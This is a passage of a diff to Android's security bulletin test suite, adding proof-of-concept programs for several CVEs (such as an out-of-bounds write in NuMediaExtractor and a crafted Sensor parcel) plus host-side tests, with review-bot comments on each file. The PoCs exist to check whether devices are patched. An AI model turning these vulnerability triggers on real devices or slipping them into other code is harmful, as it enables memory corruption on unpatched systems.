</instrumentation>
</manifest>
diff --git a/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml b/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
index 977b888..75f05b1 100644
--- a/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
+++ b/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.cts"
android:label="Device test app for MediaExtractor host side tests.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21118.bin b/hostsidetests/securitybulletin/res/cve_2023_21118.bin
new file mode 100644
index 0000000..6dc2aaa
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21118.bin
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21127.ogg b/hostsidetests/securitybulletin/res/cve_2023_21127.ogg
new file mode 100644
index 0000000..f5e9deb
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21127.ogg
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21261.ttf b/hostsidetests/securitybulletin/res/cve_2023_21261.ttf
new file mode 100644
index 0000000..882ad96
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21261.ttf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v1-only-10-signers.apk b/hostsidetests/securitybulletin/res/v1-only-10-signers.apk
new file mode 100644
index 0000000..198beeb
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v1-only-10-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v1-only-11-signers.apk b/hostsidetests/securitybulletin/res/v1-only-11-signers.apk
new file mode 100644
index 0000000..95e6c61
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v1-only-11-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v2-only-10-signers.apk b/hostsidetests/securitybulletin/res/v2-only-10-signers.apk
new file mode 100644
index 0000000..ad34c14
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v2-only-10-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v2-only-11-signers.apk b/hostsidetests/securitybulletin/res/v2-only-11-signers.apk
new file mode 100644
index 0000000..674b6e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v2-only-11-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp
new file mode 100644
index 0000000..579666e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2022-20357",
+ defaults: [
+ "cts_hostsidetests_securitybulletin_defaults",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libgui",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp
new file mode 100644
index 0000000..ad773c8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define private public
+
+#include <gui/SurfaceComposerClient.h>
+#include <gui/SurfaceControl.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+int main() {
+ constexpr int32_t val = 0;
+ constexpr int32_t width = 100;
+ constexpr int32_t height = 100;
+ std::string layerName = "layerName";
+ constexpr int32_t createFlags =
+ ISurfaceComposerClient::eCursorWindow | ISurfaceComposerClient::eOpaque;
+ constexpr PixelFormat formats[] = {PIXEL_FORMAT_RGBA_1010102, PIXEL_FORMAT_RGBA_FP16,
+ PIXEL_FORMAT_RGBA_4444};
+
+ sp<SurfaceComposerClient> surfaceComposerClient = new SurfaceComposerClient();
+
+ for (PixelFormat format : formats) {
+ sp<SurfaceControl> surfaceControl =
+ new SurfaceControl(surfaceComposerClient, nullptr, val, layerName, width, height,
+ format, val, createFlags);
+ sp<SurfaceControl> newSurfaceControl = new SurfaceControl(surfaceControl);
+ FAIL_CHECK(newSurfaceControl->mWidth == width);
+ FAIL_CHECK(newSurfaceControl->mHeight == height);
+ FAIL_CHECK(newSurfaceControl->mCreateFlags == createFlags);
+ if (newSurfaceControl->mFormat == format) {
+ return EXIT_SUCCESS;
+ }
+ }
+
+ return EXIT_VULNERABLE;
+}
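Review bot: `#define private public` sits ahead of every include and is never undone, so it also rewrites access specifiers in everything the gui headers and `../includes/common.h` pull in. Redefining a keyword before standard-library headers are included is undefined behaviour. Add `#undef private` directly after the two `<gui/...>` includes, with a comment that the macro exists only so the checks can read `mWidth`, `mHeight`, `mCreateFlags` and `mFormat`. The `for` loop also lacks a comment stating the pass criterion: as written it returns `EXIT_SUCCESS` on the first format that is preserved and `EXIT_VULNERABLE` only when none is. `std::string` is used without including `<string>`.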
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp
new file mode 100644
index 0000000..e235d48
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2023-21118",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ shared_libs: [
+ "libsensor",
+ "libbinder",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp
new file mode 100644
index 0000000..e79dc69
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp
@@ -0,0 +1,55 @@
+/**
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/Parcel.h>
+#include <sensor/Sensor.h>
+
+#include <fstream>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+using namespace android;
+using namespace std;
+
+char enable_selective_overload = ENABLE_NONE;
+
+void fillParcel(Parcel &reply) {
+ ifstream inputFile("cve_2023_21118.bin", ios::binary);
+ FAIL_CHECK(inputFile.is_open());
+
+ // Compute size of file
+ inputFile.seekg(0, std::ios::end);
+ std::streampos fileSize = inputFile.tellg();
+ inputFile.seekg(0, std::ios::beg);
+
+ // Fill parcel with file data
+ vector<uint8_t> fileData(fileSize);
+ inputFile.read(reinterpret_cast<char *>(fileData.data()), fileSize);
+ inputFile.close();
+ reply.write(fileData.data(), fileSize);
+ reply.setDataPosition(25044 /* Set data position to required position */);
+}
+
+int main() {
+ Parcel reply;
+ Sensor s;
+ fillParcel(reply);
+ enable_selective_overload = ENABLE_ALL;
+ reply.read(s);
+ enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+ return 0;
+}
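Review bot: `fillParcel` never checks that the resource file was read in full or that it is longer than the hard-coded position 25044, so a truncated or empty `cve_2023_21118.bin` lets `reply.read(s)` run on no meaningful data and the test reports the device as not vulnerable. `tellg()` can also return -1 on failure, and that value goes straight into the `vector` constructor. I would add `FAIL_CHECK(fileSize > 25044);` after the size computation and `FAIL_CHECK(inputFile.good());` after the `read` call. The inline comment on `setDataPosition` should say what sits at offset 25044 in the input rather than "required position".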
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp
new file mode 100644
index 0000000..99c3515
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2023-21127",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ shared_libs: [
+ "libstagefright",
+ "libstagefright_foundation",
+ "libutils",
+ ],
+ header_libs: [
+ "libstagefright_headers",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ "-O0",
+ ],
+}
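Review bot: The `-O0` entry in `cflags` has no comment, and nothing else in this module says why optimisation must be off. It is presumably there so the compiler does not reorder or drop the `std::vector` allocation that poc.cpp brackets with `enable_selective_overload`, but that is an inference. A short comment such as `// -O0: keep the guarded allocation in poc.cpp exactly where it is written` (corrected to the real reason) would stop someone removing the flag later and silently turning the test into a false pass.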
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp
new file mode 100644
index 0000000..befb449
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/NuMediaExtractor.h>
+#include <media/stagefright/foundation/ABuffer.h>
+#include <stdlib.h>
+#include <vector>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+using namespace android;
+
+char enable_selective_overload = ENABLE_NONE;
+
+constexpr size_t kTrackIndex = 0;
+
+int main(int argc, char **argv) {
+ FAIL_CHECK(argc == 2);
+
+ sp<NuMediaExtractor> extractor = new NuMediaExtractor(NuMediaExtractor::EntryPoint::OTHER);
+ FAIL_CHECK(extractor);
+
+ extractor->setDataSource(nullptr /* httpService */, argv[1]);
+ extractor->selectTrack(kTrackIndex);
+ size_t sampleSize = -1;
+ extractor->getSampleSize(&sampleSize);
+ FAIL_CHECK(sampleSize != -1);
+
+ enable_selective_overload = ENABLE_ALL;
+ std::vector<uint8_t> data(sampleSize);
+ enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+ FAIL_CHECK(data.size() == sampleSize);
+
+ sp<ABuffer> buffer = new ABuffer(data.data(), sampleSize);
+ FAIL_CHECK(buffer);
+
+ // Setting the offset such that the buffer starts from the next byte after the last byte in the
+ // alignment in order to just write into the write protected region of the allocation.
+ // e.g. for a buffer of size 16 bytes,
+ // if 10 bytes are to be written
+ // then the offset should be 7 to cause an OOB write on the 17th byte.
+ size_t offset = MINIMUM_ALIGNMENT - (sampleSize % MINIMUM_ALIGNMENT) + 1;
+ size_t updatedSize = buffer->capacity() - offset;
+ buffer->setRange(offset, updatedSize);
+
+ // Calling the vulnerable function readSampleData() here causes an OOB write.
+ extractor->readSampleData(buffer);
+ return EXIT_SUCCESS;
+}
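Review bot: `buffer->capacity() - offset` wraps around when the first sample is shorter than `offset`, which can be as large as MINIMUM_ALIGNMENT + 1. The PoC would then most likely abort in `setRange` rather than fault inside `readSampleData`, which is the only crash the host test filters for. A guard before computing `updatedSize`, `FAIL_CHECK(offset <= buffer->capacity());`, turns that case into an explicit test failure. The status values returned by `setDataSource`, `selectTrack` and `getSampleSize` are also discarded; checking them would separate a bad input file from a patched device. `FAIL_CHECK(sampleSize != -1)` compares a `size_t` with an `int`, and `SIZE_MAX` would state the sentinel directly.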
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp
new file mode 100644
index 0000000..88340f4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2023-21261",
+ defaults: [
+ "cts_hostsidetests_securitybulletin_defaults",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libft2",
+ ],
+ cflags: [
+ "-DFT2_BUILD_LIBRARY",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp
new file mode 100644
index 0000000..06c9826
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ft2build.h>
+#include FT_FREETYPE_H
+#include "../includes/common.h"
+#include <freetype/internal/ftdebug.h>
+
+FT_Face face = nullptr;
+FT_Library library = nullptr;
+
+void exitHandler(void) {
+ if (face) {
+ FT_Done_Face(face);
+ }
+ if (library) {
+ FT_Done_FreeType(library);
+ }
+}
+
+int main(int argc, char **argv) {
+ FAIL_CHECK(argc == 3);
+ atexit(exitHandler);
+ // Initialize FreeType library
+ FT_Error error = FT_Init_FreeType(&library);
+ FAIL_CHECK(!error);
+
+ // Load the font file
+ const int face_index = -1;
+ error = FT_New_Face(library, argv[2], face_index, &face);
+ FAIL_CHECK(!error);
+ if (strcmp(argv[1], "CVE-2022-27406")) {
+ return (face->face_index == face_index) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+ }
+ face->size = nullptr;
+ error = FT_Set_Char_Size(face, 0 /* char_width */, 0 /* char_height */,
+ 0 /* horz_resolution */, 0 /* vert_resolution */);
+ FAIL_CHECK((error == FT_THROW(Invalid_Size_Handle)));
+ return EXIT_SUCCESS;
+}
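Review bot: The mode switch on `argv[1]` is undocumented and reads inverted. `if (strcmp(argv[1], "CVE-2022-27406"))` is true for every argument except that CVE id, and that is the branch where the `face_index` check runs. I would write `if (strcmp(argv[1], "CVE-2022-27406") != 0)` and add a comment above it naming which CVE each branch covers and which outcome marks the device as vulnerable. `strcmp` and `atexit` are used without `<string.h>` and `<stdlib.h>` being included in this file; they presumably arrive through `common.h` or the FreeType headers, but including them directly removes that dependency.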
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/memutils.c b/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
index 0fdadb6..afc893c 100644
--- a/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
+++ b/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
@@ -24,6 +24,7 @@
#include <signal.h>
#include "memutils.h"
+map_struct_t s_free_list[MAX_ENTRIES] = {};
map_struct_t s_mem_map[MAX_ENTRIES] = {};
void exit_handler(void) {
size_t page_size = getpagesize();
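Review bot: The new definition of `s_free_list` is unconditional as far as this hunk shows, while the matching `extern` declaration in memutils.h sits inside the block closed by `#endif /* CHECK_USE_AFTER_FREE_WITH_WINDOW_SIZE */`. Every PoC that compiles memutils.c would then carry a `MAX_ENTRIES`-element array even when the use-after-free window is not enabled. Wrapping the definition in the same `#ifdef CHECK_USE_AFTER_FREE_WITH_WINDOW_SIZE` … `#endif` keeps declaration and definition in step. The conditionals around this part of memutils.c are outside the hunk, so confirm it is not already guarded.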
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/memutils.h b/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
index 73f798b..251ccc4 100644
--- a/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
+++ b/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
@@ -60,7 +60,7 @@
static int s_free_write_index = 0;
static int s_free_read_index = 0;
static int s_free_list_size = 0;
-map_struct_t s_free_list[MAX_ENTRIES];
+extern map_struct_t s_free_list[MAX_ENTRIES];
#endif /* CHECK_USE_AFTER_FREE_WITH_WINDOW_SIZE */
extern map_struct_t s_mem_map[MAX_ENTRIES];
#if (!(defined CHECK_OVERFLOW) && !(defined CHECK_UNDERFLOW))
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
index a5e6557..603292a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
@@ -17,10 +17,12 @@
package android.security.cts;
import static org.junit.Assert.*;
+import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.KernelVersionHost;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
@@ -36,6 +38,7 @@
@AsbSecurityTest(cveBugId = 174737879)
@Test
public void testPocCVE_2020_29374() throws Exception {
+ assumeTrue(KernelVersionHost.isKernelVersionGreaterThanEqualTo(getDevice(), "5.4.0"));
AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2020-29374", getDevice(),60);
}
}
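Review bot: The added `assumeTrue` has no message and no comment, so on a kernel older than 5.4.0 the test is reported as skipped with no reason recorded. Someone reading the results cannot tell that the device was left unchecked for this CVE rather than found clean. Use the two-argument form, for example `assumeTrue("CVE-2020-29374 PoC only runs on kernel >= 5.4.0", KernelVersionHost.isKernelVersionGreaterThanEqualTo(getDevice(), "5.4.0"));`, and add a one-line comment saying why older kernels are excluded.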
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java
new file mode 100644
index 0000000..3955b56
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java
@@ -0,0 +1,92 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39622 extends NonRootSecurityTestCase {
+ private static final String GBOARD_PKG_NAME = "com.google.android.inputmethod.latin";
+ private static final String RECORD_AUDIO_PERMISSION = "android.permission.RECORD_AUDIO";
+
+ @AsbSecurityTest(cveBugId = 192663648)
+ @Test
+ public void testPocCVE_2021_39622() {
+ ITestDevice iTestDevice = null;
+ boolean wasPermissionGranted = false;
+ try {
+ final String testPkg = "android.security.cts.CVE_2021_39622";
+ final String testClass = testPkg + "." + "DeviceTest";
+ final String testApp = "CVE-2021-39622.apk";
+ final String mIdGboard = "/com.android.inputmethod.latin.LatinIME";
+ iTestDevice = getDevice();
+ assumeTrue(
+ AdbUtils.runCommandLine("pm list packages", iTestDevice)
+ .contains(GBOARD_PKG_NAME));
+
+ if (AdbUtils.runCommandLine(
+ "dumpsys package "
+ + GBOARD_PKG_NAME
+ + " | grep "
+ + RECORD_AUDIO_PERMISSION,
+ iTestDevice)
+ .contains("granted=true")) {
+ // android.permission.RECORD_AUDIO has flag USER_SENSITIVE_WHEN_GRANTED
+ AdbUtils.runCommandLine(
+ "pm revoke " + GBOARD_PKG_NAME + " " + RECORD_AUDIO_PERMISSION,
+ iTestDevice);
+ wasPermissionGranted = true;
+ }
+
+ if (!AdbUtils.runCommandLine("ime list -s", iTestDevice)
+ .contains(GBOARD_PKG_NAME + mIdGboard)) {
+ AdbUtils.runCommandLine("ime enable " + GBOARD_PKG_NAME + mIdGboard, iTestDevice);
+ }
+
+ AdbUtils.runCommandLine(
+ "ime set " + GBOARD_PKG_NAME + RECORD_AUDIO_PERMISSION, iTestDevice);
+ installPackage(testApp);
+ runDeviceTests(testPkg, testClass, "testPocCVE_2021_39622");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // revert RECORD_AUDIO permission changes for Gboard
+ if (wasPermissionGranted) {
+ AdbUtils.runCommandLine(
+ "pm grant " + GBOARD_PKG_NAME + " " + RECORD_AUDIO_PERMISSION,
+ iTestDevice);
+ }
+
+ // Revert input method changes
+ AdbUtils.runCommandLine("ime reset", iTestDevice);
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
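Review bot: The `ime set` command is built from `GBOARD_PKG_NAME + RECORD_AUDIO_PERMISSION`, which yields the package name glued to the permission string instead of an input-method id. Gboard is therefore never selected as the active IME, and the device test may run against whatever keyboard was already set. The `ime enable` call just above uses the right operand, so the line should read `"ime set " + GBOARD_PKG_NAME + mIdGboard, iTestDevice);`. Separately, `ime reset` in the `finally` block restores defaults rather than the IME that was active before the test; if that matters on shared devices, record the previous IME and set it back.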
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
index cc9d347..c12cf33 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -17,10 +17,10 @@
package android.security.cts;
import static org.junit.Assume.assumeNoException;
-import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.UserUtils;
import com.android.sts.common.tradefed.testtype.RootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -30,6 +30,7 @@
@RunWith(DeviceJUnit4ClassRunner.class)
public class CVE_2022_20112 extends RootSecurityTestCase {
+ private static final String FEATURE_AUTOMOTIVE = "android.hardware.type.automotive";
// b/206987762
// Vulnerable module : com.android.settings
@@ -38,51 +39,31 @@
@AsbSecurityTest(cveBugId = 206987762)
@Test
public void testPocCVE_2022_20112() {
- final String testPkg = "android.security.cts.CVE_2022_20112";
- ITestDevice device = null;
- int currentUser = -1;
- int newUser = -1;
try {
- device = getDevice();
+ // This setting is not supported on automotive
+ if (isAutomotive()) return;
- // Device wakeup and unlock
- AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
- AdbUtils.runCommandLine("wm dismiss-keyguard", device);
+ final ITestDevice device = getDevice();
+ try (AutoCloseable asGuestUser =
+ new UserUtils.SecondaryUser(device)
+ .name("CTSUser")
+ .guest()
+ .doSwitch()
+ .withUser()) {
+ // Install PoC application in guest user
+ installPackageAsUser(
+ "CVE-2022-20112.apk", false /* grantPermission */, device.getCurrentUser());
- // Get current user
- currentUser = device.getCurrentUser();
-
- // Create new guest user 'CTSUser' for test
- newUser = device.createUser("CTSUser", true, false);
-
- // Start new guest user 'CTSUser'
- assumeTrue("Unable to create new guest user", device.startUser(newUser, true));
-
- // Switch to new user 'CTSUser'
- assumeTrue("Unable to switch to guest user", device.switchUser(newUser));
-
- // Install PoC application
- installPackage("CVE-2022-20112.apk");
-
- runDeviceTests(testPkg, testPkg + ".DeviceTest", "testprivateDnsPreferenceController");
+ final String testPkg = "android.security.cts.CVE_2022_20112";
+ runDeviceTests(
+ testPkg, testPkg + ".DeviceTest", "testPrivateDnsPreferenceController");
+ }
} catch (Exception e) {
assumeNoException(e);
- } finally {
- try {
- if (currentUser != -1) {
- // Switch back to previous user
- device.switchUser(currentUser);
- }
- if (newUser != -1) {
- // Stop user 'CTSUser'
- device.stopUser(newUser);
-
- // Remove user 'CTSUser'
- device.removeUser(newUser);
- }
- } catch (Exception e) {
- // Ignore exception here
- }
}
}
+
+ private boolean isAutomotive() throws Exception {
+ return getDevice().hasFeature(FEATURE_AUTOMOTIVE);
+ }
}
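Review bot: `if (isAutomotive()) return;` makes the test report as passed on automotive builds although nothing was checked. A security test that did not run should show up as skipped, which is what the rest of this method does through `assumeNoException`. Replace the early return with `assumeFalse("Private DNS setting is not supported on automotive", isAutomotive());` and add `import static org.junit.Assume.assumeFalse;`. The renamed device-side method `testPrivateDnsPreferenceController` must match the DeviceTest class, which is not part of this hunk.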
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java
new file mode 100644
index 0000000..e492eb0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocStatusAsserter.assertNotVulnerableExitCode;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
